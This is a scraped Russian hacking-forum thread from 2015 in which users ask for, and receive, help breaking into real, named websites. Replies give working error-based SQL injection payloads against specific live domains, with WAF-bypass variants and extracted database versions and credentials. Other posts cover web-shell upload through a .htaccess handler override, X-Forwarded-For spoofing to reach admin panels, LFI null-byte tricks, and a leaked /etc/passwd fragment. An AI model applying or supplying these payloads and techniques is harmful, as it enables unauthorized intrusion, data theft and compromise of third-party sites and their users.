http://payonline.ru/error/?aspxerrorpath=/'"-->netsparker(0x0004B4) (http://payonline.ru/error/?aspxerrorpath=/%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker%280x0004B4%29%3C/scRipt%3E)
тут вообще интервал сервер еррор .
Нашёл crossdomain.xml
Code:
что это ? .
/threads/300591/ (https://antichat.live/threads/300591/)
SaNDER said:
↑ (https://antichat.live/posts/3890730/)
там не указаны домены,а они нужны .
7 раз перечитайте тему, один раз напишите комментарий
Мозг себе сломал ,а не скрипт. Есть ли уязвимость в двух скриптах или нет?
sqlmap говорит, что нет.
Всякие акинетиксы и вебкрайсеры говорят, что там чуть ли не слепая инъекция.
Приложить лог не могу. Не в txt формате.
Но говорит, что какие-то уязвимости есть, хотя тем же sqlmap я найти не могу.
Так ли это или нет?
Code:
http://www.mydreams.ru/banners.php?bid=2&op=click
http://www.mydreams.ru/usersearch.php?op=search&new=1&fm=1
http://www.mydreams.ru/usersearch.php?new=1&fm=1&op=99999999
http://www.mydreams.ru/usersearch.php?fromAge=3776996&name_mask=3234652&op=search&whom=0&country=57&search_method=1&toAge=99999999
http://www.mydreams.ru/pollresults.php?poll_id=18&filter=
Выяснил, что это XOOPS
но все равно непонятно, почему по одной и той же ссылке
http://www.mydreams.ru/usersearch.php?op=search&new=1&fm=1
Havij определяет это либо как уязвимость, а sqlmap не видит в упор
Всего лишь нет какого-то там плагина, аплета.
Это cms
Code:
Community Forum Software by IP.Board 3.4.6
Уязвимости можно посмотретть на http://exploit-db.com
SaNDER said:
↑ (https://antichat.live/posts/3891094/)
Code:
http://gmodtower.ru/index.php?app=core&inapp=&module=global§ion=navigation
там внизу написано invalid app .
Здесь есть какая-нибудь уязвимость и если да,то какая подскажите пожалуйста .
Попробуй просмотреть module,попадалось такое на LFI(4096) если не ошибаюсь.
SaNDER said:
↑ (https://antichat.live/posts/3890730/)
там не указаны домены,а они нужны .
Если нужны под домены ,то в гугле есть на питоне brute knock.py
DezMond™
16.09.2015, 16:26
http://www.die-medienanstalten.de/i...nsor=14&iFromYear=all&iToYear=all&sBoolOp=and (http://www.die-medienanstalten.de/index.php?search=&id=78&sFullTextSearch=&sPersonSearch=a'&iSIG=3&iSponsor=14&iFromYear=all&iToYear=all&sBoolOp=and)
хелп
DezMond™ said:
↑ (https://antichat.live/posts/3891827/)
http://www.die-medienanstalten.de/i...nsor=14&iFromYear=all&iToYear=all&sBoolOp=and (http://www.die-medienanstalten.de/index.php?search=&id=78&sFullTextSearch=&sPersonSearch=a'&iSIG=3&iSponsor=14&iFromYear=all&iToYear=all&sBoolOp=and)
хелп
Что там не получается?
DezMond™
16.09.2015, 20:28
http://www.die-medienanstalten.de/i...nsor=14&iFromYear=all&iToYear=all&sBoolOp=and (http://www.die-medienanstalten.de/index.php?search=&id=78&sFullTextSearch=&sPersonSearch=a'or(ExtractValue(1,concat(0x3a,(sel ect(table_name)from(information_schema.tables))))) ='1&iSIG=3&iSponsor=14&iFromYear=all&iToYear=all&sBoolOp=and)
как лимитами перебрать? (ошибка returns more than 1 row)
и есть ли таблица be_users (она должна быть) в других базах? не могу найти(
winstrool
16.09.2015, 22:59
как Remote File Inclusion (RFI) Идем читать статьи по PHP инклудам, в часто задаваемых вопросах, закрепленной ветки этого раздела - /threads/104591/ (https://antichat.live/threads/104591/)
Ошибка при сканировании sqlmap
Code:
[23:52:55] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point
Запрос:
Code:
python sqlmap.py -u "http://www.doskaurala.ru/add.php?cats=3" --eta --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db
Я так понял из ошибки,что он не может разобрать что за БД используется.
Как тогда в этом случае подставлять запрос?
DezMond™ said:
↑ (https://antichat.live/posts/3891827/)
http://www.die-medienanstalten.de/i...nsor=14&iFromYear=all&iToYear=all&sBoolOp=and (http://www.die-medienanstalten.de/index.php?search=&id=78&sFullTextSearch=&sPersonSearch=a'&iSIG=3&iSponsor=14&iFromYear=all&iToYear=all&sBoolOp=and)
хелп
http://www.die-medienanstalten.de/i...nsor=14&iFromYear=all&iToYear=all&sBoolOp=and (http://www.die-medienanstalten.de/index.php?search=&id=78&sFullTextSearch=&sPersonSearch=a'or%28ExtractValue%281,concat%280x3 a,%28select%28group_concat%28table_name%29%29from% 28information_schema.tables%29%29%29%29%29='1&iSIG=3&iSponsor=14&iFromYear=all&iToYear=all&sBoolOp=and)
Как открыть paswd.db и group.db
zifus said:
↑ (https://antichat.live/posts/3892177/)
Как открыть paswd.db и group.db
смотря от чего эти файлы.
zifus said:
↑ (https://antichat.live/posts/3892177/)
Как открыть paswd.db и group.db
блокнотом, даже если содержимое не читается.
Посмотри первые 5-6 байт, там обычно светится сигнатура, по которой можно определить реальное приложение для работы с файлами.
Это с сервера
кусок с passwd а ниже идут юзеры
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
А открываю блокнотом еще и еироглефы какие то
читал что без /etc/shadow не открыть
DezMond™
17.09.2015, 23:15
Br@!ns said:
↑ (https://antichat.live/posts/3892054/)
http://www.die-medienanstalten.de/index.php?search=&id=78&sFullTextSearch=&sPersonSearch=a'or(ExtractValue(1,concat(0x3a,(sel ect(group_concat(table_name))from(information_sche ma.tables)))))='1&iSIG=3&iSponsor=14&iFromYear=all&iToYear=all&sBoolOp=and (http://www.die-medienanstalten.de/index.php?search=&id=78&sFullTextSearch=&sPersonSearch=a'or%28ExtractValue%281,concat%280x3 a,%28select%28group_concat%28table_name%29%29from% 28information_schema.tables%29%29%29%29%29='1&iSIG=3&iSponsor=14&iFromYear=all&iToYear=all&sBoolOp=and)
А limit как перебрать?
DezMond™ said:
↑ (https://antichat.live/posts/3892274/)
А limit как перебрать?
Если у Вас не получается использовать лимит, заверните group_concat в mid/substr/substring.
Sharingan
19.09.2015, 21:14
Здравствуйте, вот уже долго гляжу в поиске античата, но не могу найти более-менее понятных статей о поиске уязвимостей на серверах. т.е. что висит на портах например, где бывают дырки. т.е. есть сервер на который хотелось бы залить шелл, но сложно понять с какой стороны копать, есть Postfix на сервере, подключился по telnet helo выполняется а остальные - error. и то, helo через раз. Может кто подскажет годных статей для начинающих. На вебморде только Zimbra. Много видел статей по взлому именно web сайтов. А тут имеется лишь форма логина и остальное сопутное на сервере на разных портах.
winstrool
19.09.2015, 22:01
DezMond™ said:
↑ (https://antichat.live/posts/3892274/)
А limit как перебрать?
Вот пожалуйста, перебирайте:
http://www.die-medienanstalten.de/i...sPersonSearch=a'or(ExtractValue(1,concat(0x3a (http://www.die-medienanstalten.de/index.php?search=&id=78&sFullTextSearch=&sPersonSearch=a'or(ExtractValue(1,concat(0x3a)
,
(select/*!12345*/table_name/*!12345*/from/*!12345*/information_schema.tables/*!12345*/limit/*!12345*/1,1)
)))='1&iSIG=3&iSponsor=14&iFromYear=all&iToYear=all&sBoolOp=and
Есть одна долгая TimeBased sql injection, что с ней можно сделать?
Как слить базу?
ButilkaSoka
20.09.2015, 05:19
Есть проблема с WAF
Code:
http://www.spbpost.ru/index.php?page_id=305+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+
Пробовал обходить, но не всеми способами.
А тут вообще без понятие что делать, не сталкивался с таким
Code:
http://frostland.pro/shop/search
POST:
search=%cd%e0%e9%f2%e8&searchword=1'%00
хелп
Га-Ноцри
20.09.2015, 06:33
По первому линку, как вариант, добиваться вывода не через конструкцию union select, а через XPATH
C пробелами:
Code:
http://www.spbpost.ru/index.php?page_id=305 and extractvalue rand(),concat(0x3a,version(),0x3a,user()))--
Аналог без пробелов:
Code:
http://www.spbpost.ru/index.php?page_id=305*updatexml(0,lpad(user(),22,0 x3A),1)#
ButilkaSoka said:
↑ (https://antichat.live/posts/3893016/)
Есть проблема с WAF
Code:
http://www.spbpost.ru/index.php?page_id=305+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+
Пробовал обходить, но не всеми способами.
А тут вообще без понятие что делать, не сталкивался с таким
Code:
http://frostland.pro/shop/search
POST:
search=%cd%e0%e9%f2%e8&searchword=1'%00
хелп
во втором случае так же через Error-based вектор:
POST
searchword=asf'or(ExtractValue(1,concat(0x3a,(sele ct(version())))))='1%00&search=%CD%E0%E9%F2%E8'
XPATH syntax error: ':10.0.11-MariaDB'
XPATH syntax error: ':frostla_main@37.187.136.213'
PS в следующий раз, если скуля в месте где нужно быть авторизованым, выкладывайте тестовый акк
index.php?p=cvv&CONTRY=&STATE=&City=&TYPE=&BASE=12.08.2015+MIX&BIN=&sub=Apply+filter
что можно сделать?
ButilkaSoka
21.09.2015, 20:14
хелп
Есть данные админки, не пускает, походу пускает через ip, но они тоже есть(ip), возможно ли их подставить, если да, то как?
winstrool
21.09.2015, 20:28
ButilkaSoka said:
↑ (https://antichat.live/posts/3893550/)
хелп
Есть данные админки, не пускает, походу пускает через ip, но они тоже есть(ip), возможно ли их подставить, если да, то как?
Если идет обработка IP по заголовку X-Forwarded-For "$_SERVER['HTTP_X_FORWARDED_FOR'];" то можно сделать подмену IP в заголовках хидера
Полезно почитать для понимания:
http://php.net/manual/ru/reserved.variables.php#79359
http://phpfaq.ru/ip
Unknowhacker
22.09.2015, 12:35
Столкнулся с проблемой загрузки шелла. Итак, перехватил данные куки - залогился , но когда нажимаю править новость в надежде загрузить шелл, то выскакивает окно Basic Authorization
Code:
http://timer-odessa.net
Log:
Code:
Array
(
[admin] => file
[do] => upload
[ID] =>
[MaterialName] => новая запись
[UrlAlias] =>
[ajax] => 1
[qqfile] => 2.jpg
[tinymcePasteText] => 1
[__cfduid] => d324f6c51adb790a7d0cce7ebea72e8291425213546
[__utma] => 31476155.825643414.1425214893.1442902126.144290859 5.874
[__utmb] => 31476155.3.10.1442908595
[__utmc] => 31476155
[__utmz] => 31476155.1441743778.772.137.utmcsr=facebook.com|ut mccn=(referral)|utmcmd=referral|utmcct=/
[_ym_visorc_15944878] => w
[PHPSESSID] => 2defc90036f0f83fb04646af0e2ab3dc
)
P.S Уже в учётке менял пароль, все равно это окно выскакивает!
winstrool
22.09.2015, 12:41
Видимо когда вы оброщаитесь к редактированию, подгружаются модули из папки которая защищена бейсик авторизацией, в перехваченных куках у вас нет куков под бейсик авторизацию.... возможно в вашей админки вам попадется локальный инклуд, где вы сможете найти файлик с паролем от бейсик авторизации...
Unknowhacker
22.09.2015, 14:25
Всё, что мне удалось найти..
Code:
http://timer-odessa.net/1/
http://timer-odessa.net/0tg
http://timer-odessa.net/uploads/
Сначала думал что шелл, но нет..
Code:
http://www.timer-odessa.net/uploads/userpix/m.php
Unknowhacker said:
↑ (https://antichat.live/posts/3893797/)
Всё, что мне удалось найти..
Code:
http://timer-odessa.net/1/
http://timer-odessa.net/0tg
http://timer-odessa.net/uploads/
Сначала думал что шелл, но нет..
Code:
http://www.timer-odessa.net/uploads/userpix/m.php
мб пригодится
http://timer-odessa.net/bak/
http://www.mariin.ru/index.php?p=fo...*/limit/**/0,1),+1,+63),+FLOOR(RAND(0)*2)))/* (http://www.mariin.ru/index.php?p=forum&action=getfile'OR/**/(SELECT+COUNT(*)/**/FROM/**/(SELECT+1/**/UNION/**/SELECT+2/**/UNION/**/SELECT+3)x/**/GROUP/**/BY/**/CONCAT(MID((select/**/'123'/**/from/**/koobi_user/**/limit/**/0,1),+1,+63),+FLOOR(RAND(0)*2)))/*)
Помогите префикс узнать у этой таблицы
всем привет. дошел до непонимания: есть SQL уязвимость, есть логин и пасс админа, однако доступ к админке спрятан за "403 Forbidden", а пользователь БД с правами "USAGE". подскажите, в какую сторону копать дальше, или это тупик?
kingbeef
23.09.2015, 21:59
__MVD said:
↑ (https://antichat.live/posts/3894208/)
всем привет. дошел до непонимания: есть SQL уязвимость, есть логин и пасс админа, однако доступ к админке спрятан за "403 Forbidden", а пользователь БД с правами "USAGE". подскажите, в какую сторону копать дальше, или это тупик?
Как вариант найти прокси из подсети админа и зайти в админку.
Народ, посоветуйте чего-нибудь. Есть скуля, есть уже прямой доступ к бд
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 10990
Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2015, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [stg]> \q
Есть current user is DBA: True
Не могу никуда записать шелл, везде права порезаны. Хотя известно расположение пхп-скриптов /var/www/site.com/ не получается прочитать конфиги, недостаточно прав. Хотя через load_file могу /etc/passwd. Мучаюсь долго, бросить жалко.
https://sgo.egov66.ru/asp/error.asp?DEST=&ET='LoginType'+param+not+found&AT= (https://sgo.egov66.ru/asp/error.asp?DEST=&ET=%27LoginType%27+param+not+found&AT=)
вот чувствую тут что то есть ... есть идеи?
ButilkaSoka
24.09.2015, 21:28
Хелп
Code:
http://www.site.com/view=sitemap&id='
Вывод Can not get the Viewsetи ошибка
Как двигаться дальше через ошибки вида ?
Code:
/page.php
site.com/page/
Например :
Code:
http://kasko-center.by/kasko.courses.php
Brut Star
24.09.2015, 21:57
Всем доброго времени суток,нужна помощь,сканируя сайт прога говорт что нашла два места Кросс Сайт атак выполнила их.У меня появился вывод куки такого плана (Set-Cookie: sid=5fc1e3d79a42ca4481e989f2a1f77498; path=/; domain=мой сайт.ru) Что с этим можно сделать подскажите пожалуйста.
Brut Star
24.09.2015, 22:03
И еще такая штука (Remote OS Command injection) (Set-Cookie: sid=72b173c6d50979ff43eecb51535a4f3e; path=/; domain=мой сайт.ru) Подскажите новичку в таком деле.
Brut Star
24.09.2015, 22:14
ButilkaSoka said:
↑ (https://antichat.live/posts/3894664/)
Хелп
Code:
http://www.site.com/view=sitemap&id='or(ExtractValue(1,concat(0x3a,(version()))))='
Вывод
Can not get the Viewset
и ошибка
Как двигаться дальше через ошибки вида ?
Code:
/page.php
site.com/page/
Например :
Code:
http://kasko-center.by/kasko.courses.php
Мне тоже интересно
Brut Star
24.09.2015, 22:16
rct said:
↑ (https://antichat.live/posts/3894581/)
Народ, посоветуйте чего-нибудь. Есть скуля, есть уже прямой доступ к бд
Есть current user is DBA: True
Не могу никуда записать шелл, везде права порезаны. Хотя известно расположение пхп-скриптов /var/www/site.com/ не получается прочитать конфиги, недостаточно прав. Хотя через load_file могу /etc/passwd. Мучаюсь долго, бросить жалко.
Таки попробуй подсунуть что то типа txt,может проканает.Бекдор подсунь и попробуй покопаться.
Timmkoy said:
↑ (https://antichat.live/posts/3892961/)
Есть одна долгая TimeBased sql injection, что с ней можно сделать?
Как слить базу?
добиться получения веб-шелла и затем слить всю бд.
SaNDER said:
↑ (https://antichat.live/posts/3893109/)
Вообщем нашёл CRFL Injection/HTML Respone splitting .
Code:
This vulnerability affects /.
Discovered by: Scripting (Error_Message.script).
Attack details
URL encoded POST input group was set to 12345'"\'\");|]*{%0d%0a%bf%27'
Error message found:
Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 5 in /var/www/u0085722/public_html/icewynd.ru/function.php on line 166
Как заюзать? .
вы что-то странное скинули, отправьте нормальный ответ и запрос сюда.
rct said:
↑ (https://antichat.live/posts/3894581/)
Народ, посоветуйте чего-нибудь. Есть скуля, есть уже прямой доступ к бд
Есть current user is DBA: True
Не могу никуда записать шелл, везде права порезаны. Хотя известно расположение пхп-скриптов /var/www/site.com/ не получается прочитать конфиги, недостаточно прав. Хотя через load_file могу /etc/passwd. Мучаюсь долго, бросить жалко.
ищите папки доступные на запись через реверс IP, перебором директорий, если FreeBSD читайте папки
Brut Star said:
↑ (https://antichat.live/posts/3894676/)
Всем доброго времени суток,нужна помощь,сканируя сайт прога говорт что нашла два места Кросс Сайт атак выполнила их.У меня появился вывод куки такого плана (Set-Cookie: sid=5fc1e3d79a42ca4481e989f2a1f77498; path=/; domain=мой сайт.ru) Что с этим можно сделать подскажите пожалуйста.
Brut Star said:
↑ (https://antichat.live/posts/3894680/)
И еще такая штука (Remote OS Command injection) (Set-Cookie: sid=72b173c6d50979ff43eecb51535a4f3e; path=/; domain=мой сайт.ru) Подскажите новичку в таком деле.
читайте про XSS и RCE.
yarbabin said:
↑ (https://antichat.live/posts/3894706/)
ищите папки доступные на запись через реверс IP, перебором директорий, если FreeBSD читайте папки
Могу записать в /tmp, но как заинклудить? Где-то читал про модули для mysql, но потерял ссылку. Не напомните как эта атака называется? Да, ОС там убунта 14.04.1 LTS без апдейтов.
rct said:
↑ (https://antichat.live/posts/3894745/)
Могу записать в /tmp, но как заинклудить? Где-то читал про модули для mysql, но потерял ссылку. Не напомните как эта атака называется? Да, ОС там убунта 14.04.1 LTS без апдейтов.
заинклудить, найдя инклуд
yarbabin said:
↑ (https://antichat.live/posts/3894844/)
заинклудить, найдя инклуд
Хех А можно заинклудить пхп который вне /var/www/site.com/ ? Это, наверное, последний вариант, т.к. mysqludf.so только от рута можно закинуть в /lib/mysql.
stas1kus
25.09.2015, 16:04
Hi,
Возник вопрос, при загрузке файла с разными манёврами я смог загрузить битый файл, найти этот файл, открыть, и увидеть вот такой вот калл (ниже). Пробовал менять мета-дату для файла с разными эксплоитами, но пока что ничего не смог найти чтоб я смог сделать интересного с помощью данного файла (алгоритма).
Порекомендуйте на что можно еще проверить \ или что можно интересного послать через данный файл. Web-server nginx
PS. сорри, с работы не могу открыть ничего с редактора, в том числе и для того чтоб вставить картинку.. поэтому просто кину линку на картинку... http://i.imgsafe.org/1f96ad5.png
спс
ocheretko
25.09.2015, 16:09
Попробуйте загрузить файл .htaccess и в нем переопределить расширение картинки на исполнение пхп сценария
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .jpg
stas1kus
25.09.2015, 16:46
эм, сорри за такой вопрос, т.е. я .htaccess файл с таким контентом просто заливаю и потом открываю какой-то файл!? ну и ладно, внесу еще 1 поправку, такой выхлоп я получил из-за того, что удалил расширение у файла... поэтому возможно не совсем подойдет ваш подход? исправте если не так понял. спс
SaNDER said:
↑ (https://antichat.live/posts/3895011/)
Как SQL подставить к COOKIE ?
Посоветуйте более современные методы для Mozilla FireFox(40-41 версия ) .
Как-нибудь вот так
Cookie: _vis_opt_s='+or+1%3D1+--+
что-ли .
не очень удобно раскручивать скулю в куках через браузер. поставь burp suite, или charles.
а так можно через Live http headers для ФФ
SaNDER said:
↑ (https://antichat.live/posts/3895057/)
А через Charles как это сделать?
ну перехвати один из запросов, потом повторно отправляй его меняя куки
И ещё на сайте blabla.com/?lang='
Вылезает такое чудо
Warning
: include(language/'.php): failed to open stream: No such file or directory in
/home/vasil78/blabla.com/libs/core.php
on line
34
Предполагаю что это File Inclusion . Как заинклудить ? .
попробуй нулл-байтом отрезать .php, или же юзать багу со слеш-дотами. ничего нового.
profishell
26.09.2015, 03:49
SaNDER said:
↑ (https://antichat.live/posts/3895190/)
Мне помог один парень . blabla.com/lang=kkkk../../index Отображается сайт c какими то ошибками .
Нужно обрезать .php,нулл-байт не решает .
А что за бага со слэш-дотами? я не понял .
http://storeshop.hol.es/gpay?note=bill
' вот тут я юнионы,group юзал не помогает,как раскрутить ?
Про слеши - https://rdot.org/forum/archive/index.php/t-2611.html
А по скуле... Че тут крутить?
http://storeshop.hol.es/gpay?note=b... 1,2,3,4,5,6,7,version(),9,10,11,12,13,14-- ' (http://storeshop.hol.es/gpay?note=bill[WFOi6uhZ60cwJs8]%27%20and%205=1%20union%20select%201,2,3,4,5,6,7,v ersion(),9,10,11,12,13,14--%20%27)
SaNDER said:
↑ (https://antichat.live/posts/3895336/)
странно но не скульмапом,не хэвиджом не инжектит . Хэвидж говорит про 403 Forbbiden,скульмап практически про тоже .
Code:
starting at: 12:52:27
[12:52:54] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS
[12:53:04] [WARNING] GET parameter 'note' is not injectable
[12:53:04] [CRITICAL] all parameters are not injectable, try to increase --level
/--risk values to perform more tests. Rerun without providing the --technique sw
itch. Give it a go with the --text-only switch if the target page has a low perc
entage of textual content (~75.91% of page content is text)
[12:53:04] [WARNING] HTTP error codes detected during testing:
403 (Forbidden) - 140 times
shutting down at: 12:53:04
пробуйте добавлять параметры типа юзер-агентов, кук, делать меньше delay и т. д.
SaNDER said:
↑ (https://antichat.live/posts/3895368/)
Я либо не правильно составляю команды,либо фигня какая-то .
Может кто выручит,другие способы есть?
(Посты за собой удалю т.к мешают .)
http://storeshop.hol.es/admin
http://storeshop.hol.es/gpay?note=b...10,password,12,13,14+from+users+limi t+0,1+--+ (http://storeshop.hol.es/gpay?note=bill[WFOi6uhZ60cwJs8]'and+1=2+union%20select+1,email,3,4,5,6,7,version( ),9,10,password,12,13,14+from+users+limit+0,1+--+)'
пароль не выкладываю, т.к нельзя. Есть на cmd5.
Вам и так все расжували уже, пробуйте ручками все делать, а не хевиджем со скулмапом.
ButilkaSoka
27.09.2015, 20:53
Хелп.
Нужна помощь в раскрутке.
Code:
http://tao.kg/?p=search&search=dota+2&Provider=Taobao&SearchMethod=Extended&cid=-1%27
http://dota2.name/request/edit/?act=skype&id=\
POST
name=skype&pk=1&value=e
Как двигаться дальше через ошибки вида:
Code:
/page.php
site.com/page/
Например:
Code:
http://kasko-center.by/kasko.courses.php
http://www.24tv.by/24old/
Есть ли тут sqli?
Code:
http://steam-store.ru/pay
POST
price=3
ButilkaSoka said:
↑ (https://antichat.live/posts/3895771/)
Хелп.
Нужна помощь в раскрутке.
Code:
http://tao.kg/?p=search&search=dota+2&Provider=Taobao&SearchMethod=Extended&cid=-1%27
http://dota2.name/request/edit/?act=skype&id=\
POST
name=skype&pk=1&value=e
Как двигаться дальше через ошибки вида:
Code:
/page.php
site.com/page/
Например:
Code:
http://kasko-center.by/kasko.courses.php
http://www.24tv.by/24old/
Есть ли тут sqli?
Code:
http://steam-store.ru/pay
POST
price=3
http://rghost.net/8YCQ8PqhC/image.png
http://kasko-center.by/kasko.courses.php
http://www.24tv.by/24old/
Просто ошибки сайта (раскрытие путей), ничего не делать, искать другие уязвимости.
SaNDER said:
↑ (https://antichat.live/posts/3895965/)
Взломав домен хостинга,можно ли взломать и сам хостинг?А после и сайты на котором стоят хостинги,тоже можно взломать ? .
домен.хостинг.ру
вытащил из него phpinfo .
а как юзать не знаю .
Узнал версию phpMyAdmin 4.4.14
Узнал версиюPHP Version 5.4.45
Server API Apache 2.0 Handler
OC Linux
apache2handler
Apache Version Apache/2.2.22 (@Release (https://antichat.live/members/44554/)@)
APCu Support Enabled
SERVER_ADDR
ну там дофига чего я лишь часть показал что ещё нужно и как это юзать?
Version 4.0.7
Работает
домен.хостинг.ру/phpMyAdmin/doc/html/search.html
Открытые порты
Spoiler
3306
1500
995
993
465
443
143
110
80
81
53/tcp и /udp
25
22
21
_ttp:moe-porno.com/acux7707%C0%BEz1%C0%BCz2a%90bcxuca7707 HTTP/1.1
Осторожно,порнуха=) .
При переходе по линке вылезает это
Code:
warning: htmlspecialchars(): Invalid multibyte sequence in argument in /home/moe-porno/data/www/moe-porno.com/includes/bootstrap.inc on line 860.
Сканил Acunetix 10-ым .
Что это SQL?File Inclusion ?
_ttp://moe-porno.com/search?searchid=2137557&text[]=&web=0 тоже самое .
Лол
Нашел phpinfo и решил взломать хостинг,фантазер однако
SaNDER said:
↑ (https://antichat.live/posts/3896161/)
домен.хостинг.ру/phpMyAdmin/doc/html/search.html
К сведению там не токо PHPinfo
. Всё же начинается по-малому,да и хостинг не золото .
Лучше помоги там где ссылка по-ниже . . Я с такой хернёй впервые сталкиваюсь .
Ну смотри,ты кое-как нарыл инфу по версиям ПО,теперь проверь есть ли на них уязвимости,сплоиты.
Но это тебе не особо поможет.
ocheretko
28.09.2015, 19:55
SaNDER said:
↑ (https://antichat.live/posts/3896161/)
домен.хостинг.ру/phpMyAdmin/doc/html/search.html
Лучше помоги там где ссылка по-ниже . . Я с такой хернёй впервые сталкиваюсь .
Invalid multibyte
говорит о том, что данные получены не в UTF-8, как ожидала функция, а хз в какой. Этот прием полезен чтобы получить раскрытие путей, что у Вас и получилось
3ran said:
↑ (https://antichat.live/posts/3896171/)
Ну смотри,ты кое-как нарыл инфу по версиям ПО,теперь проверь есть ли на них уязвимости,сплоиты.
Но это тебе не особо поможет.
Если идти последовательно, то сперва всегда идет сбор данных, а после проверка гипотез
RedFern.89
29.09.2015, 14:06
Code:
http://www.game-debate.com/benchmark/bm_datatable.php?bRegex=false&bRegex_0=false&bRegex_1=false&bRegex_10=false&bRegex_11=false&bRegex_2=false&bRegex_3=false&bRegex_4=false&bRegex_5=false&bRegex_6=false&bRegex_7=false&bRegex_8=false&bRegex_9=false&bSearchable_0=true&bSearchable_1=true&bSearchable_10=true&bSearchable_11=true&bSearchable_2=true&bSearchable_3=true&bSearchable_4=true&bSearchable_5=true&bSearchable_6=true&bSearchable_7=true&bSearchable_8=true&bSearchable_9=true&bSortable_0=true&bSortable_1=true&bSortable_10=true&bSortable_11=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&bSortable_8=true&bSortable_9=true&iColumns=12&iDisplayLength=1%27%22&iDisplayStart=0&iSortCol_0=1&iSortingCols=1&mDataProp_0=rbt_tool&mDataProp_1=rb_bench&mDataProp_10=m_graf&mDataProp_11=rbt_test&mDataProp_2=m_cpu_deriv&mDataProp_3=m_graf_deriv&mDataProp_4=rbt_types&mDataProp_5=m_username&mDataProp_6=rb_date&mDataProp_7=rb_id&mDataProp_8=m_id&mDataProp_9=m_cpu&sColumns=&sEcho=3&sSearch=&sSearch_0=&sSearch_1=&sSearch_10=&sSearch_11=&sSearch_2=&sSearch_3=&sSearch_4=&sSearch_5=&sSearch_6=&sSearch_7=&sSearch_8=&sSearch_9=&sSortDir_0=asc&_=1443468868286
Возможно ли раскрутить?
cheebeez
30.09.2015, 18:41
[DEL 32]
SaNDER said:
↑ (https://antichat.live/posts/3896907/)
_ttp://steamplay.ru/confirm_buying
в /confirm_buying находится скуль инжект(правда,сканер не врёт) .
Через Post посылаю id_goods=1'",выводит обратно на главную страницу .
Тогда как сканер туда попал ? . И как мне туда попасть? .
куки куки, сессию подключения вероятно нужно передавать
Через Post посылаю id_goods=1
юзай curl, в firefox(firebug) к тому же можно скопировать запрос в формате curl
ButilkaSoka
30.09.2015, 23:43
SaNDER said:
↑ (https://antichat.live/posts/3896997/)
POST /confirm_buying HTTP/1.1 Content-Length: 353 Content-Type: application/x-www-form-urlencoded Referer:
http://steamplay.ru:80/
А вот то что сканер видит :
Code:
A Database Error Occurred
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"'' at line 1
UPDATE `items` SET `views` = `views` + 1 WHERE `digiseller_id` = '1'"'
Filename: /home/s/steampxb/steampxb.bget.ru/public_html/helpers/top10_helper.php
Line Number: 30
Но вот,что странно
Response показывает это :
Code:
HTTP/1.1 500 Internal Server Error Server: nginx/1.9.4 Date: Wed, 30 Sep 2015 08:24:41 GMT Content-Type: text/html Content-Length: 1500 Connection: keep-alive Keep-Alive: timeout=30 X-Powered-By: PHP/5.4.44
.
В Acunetix есть HTTP Editor, там будет id_goods=1, через XPATH
Code:
csrf_ytse_token=01cc4a2e39c048f58f725bfe26e5d57c&failpage=http://steamplay.ru
/&goods_title=BRILLIANT%20STEAM%20%d0%ba%d0%bb%d1%8e %d1%87%20%2b%5b
%20CS%20GO%20Arma%20DAYZ%20GTA%20%5d%2b%20%d0%9f%d 0%9e%d0%94%d0%90
%d0%a0%d0%9a%d0%98&id_agent=390191&id_goods=1'or(ExtractValue(0x3a,concat(0x3a,(selec t version()))))='&price=15&thumbnail=1910800.jpg&token=27091&type_curr=WMR
XPATH syntax error: ':5.6.26-74.0-beget-log'
cheebeez
01.10.2015, 00:39
[DEL 33]
RedFern.89
01.10.2015, 01:51
Возможно ли раскрутить?
Code:
http://prodota.ru/news/?p=\
возможно,каков вопрос-такой ответ
Дельный совет чуваки,сначало пробуйте методом проб и ошибок,потом задавайте вопрос,это для вас же будет лучше,больше поймте
RedFern.89 said:
↑ (https://antichat.live/posts/3896418/)
Code:
***
Возможно ли раскрутить?
Вероятно инъекция в LIMIT. Попробуйте применить соответствующий вектор:
Code:
PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY updatexml(1, concat(0x3A, version()), 1)))
https://rdot.org/forum/showthread.php?t=60&page=3
RedFern.89 said:
↑ (https://antichat.live/posts/3897121/)
Возможно ли раскрутить?
Code:
http://prodota.ru/news/?p=\
Функционал, преобразующий номер страницы в числа LIMIT-ов, никогда не был и не будет уязвим к атакам типа SQLi. Если вы видете в ответе что-то вроде этого:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20'
Смело считайте, что там ничего нет. Эти инъекции стабильно появляются у нас в теме раз в неделю.
cheebeez
01.10.2015, 13:48
[DEL 35]
Доброго времени суток друзья, пытаюсь найти что-то интересно и вывести ошибки на сайте.
Подставляю кавычку в параметр page, он отображает эту ковычку с обратным слешем.
ventilyatory-c-904_26.html?page=2'&filter_id=287
На определенных страницах, пишет "Интернет-магазин закрыт на техническое обслуживание, заходите позже!"
ventilyatory-c-904_26.html?ppp=50'
Подскажите пожалуйста, можно как-нибудь вывести ошибку в итоге ? И что это за случай ?
Заранее спасибо.
cheebeez
01.10.2015, 20:11
[DEL 38]
ButilkaSoka
02.10.2015, 00:04
ХЕЛП
если
Code:
